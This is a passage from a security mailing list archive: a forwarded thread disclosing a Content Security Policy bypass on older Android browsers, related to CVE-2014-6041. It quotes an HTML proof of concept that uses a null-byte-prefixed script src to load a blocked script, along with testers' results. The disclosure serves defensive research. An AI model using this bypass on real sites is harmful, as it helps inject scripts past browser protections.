Full Disclosure mailing list archives
Fwd: Re: CSP Bypass on Android prior to 4.4
From: Vitor Ventura <ventura.vitor () gmail com>
Date: Tue, 14 Oct 2014 12:33:14 +0100
---------- Mensagem encaminhada ---------- De: "Vitor Ventura" <ventura.vitor () gmail com> Data: 14/10/2014 12:32 Assunto: Re: [FD] CSP Bypass on Android prior to 4.4 Para: "E Boogie" <evanjjohns () gmail com> Cc: Hello, My testing was done on BQ aquaris 5 HD with android 4.2.1 using chrome. It wasn't vulnerable. Regards VV Em 14/10/2014 00:12, "E Boogie" <evanjjohns () gmail com> escreveu:
I've done a little more testing and what I've found is pretty startling. I tested on a Galaxy Note 2 running Android 4.4.2 and the CSP bypass worked. I also tested on an old version of Safari on an iPad (Safari/7534.48.3) and the CSP bypass also worked. If you are so kind, please use ejj.io/test.php to test this for me. If it worked, please press the "IT WORKED" button. This way I can compile a large finger print of browsers/phones/versions the CSP bypass worked on (based on user-agent) Evan J. On Sat, Oct 11, 2014 at 4:09 PM, E Boogie <evanjjohns () gmail com> wrote:I've found a Content Security Policy bypass similar and related to thesame origin policy bypass in CVE-2014-6041. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041I've tested this on an Android 4.3 tablet running a bunch of differentbrowsers, including Inbrowser, Firefox, and the default Android browser on an emulator for Android 4.3.1.HTML PoC: <input type=button value="test" onclick=" a=document.createElement('script'); a.id='AA'; a.src='\u0000https://js.stripe.com/v2/'; document.body.appendChild(a);setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{ alert(2);}}, 400);return false;"> The content security policy rule that should block this is script-src 'self' https://js.stripe.com/v3/ ; The PoC worked if you see a popup containing stripes e(){} object. I setthe Timeout kind of short, so you may have to press the button twice before you see the popup.I have a PoC test page at ejj.io/test.php Cheers, Evan J -- Evan J Johnson_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CSP Bypass on Android prior to 4.4 E Boogie (Oct 11)
- Re: CSP Bypass on Android prior to 4.4 E Boogie (Oct 13)
- Re: CSP Bypass on Android prior to 4.4 E Boogie (Oct 13)
- Message not available
- Fwd: Re: CSP Bypass on Android prior to 4.4 Vitor Ventura (Oct 14)
- Re: CSP Bypass on Android prior to 4.4 E Boogie (Oct 13)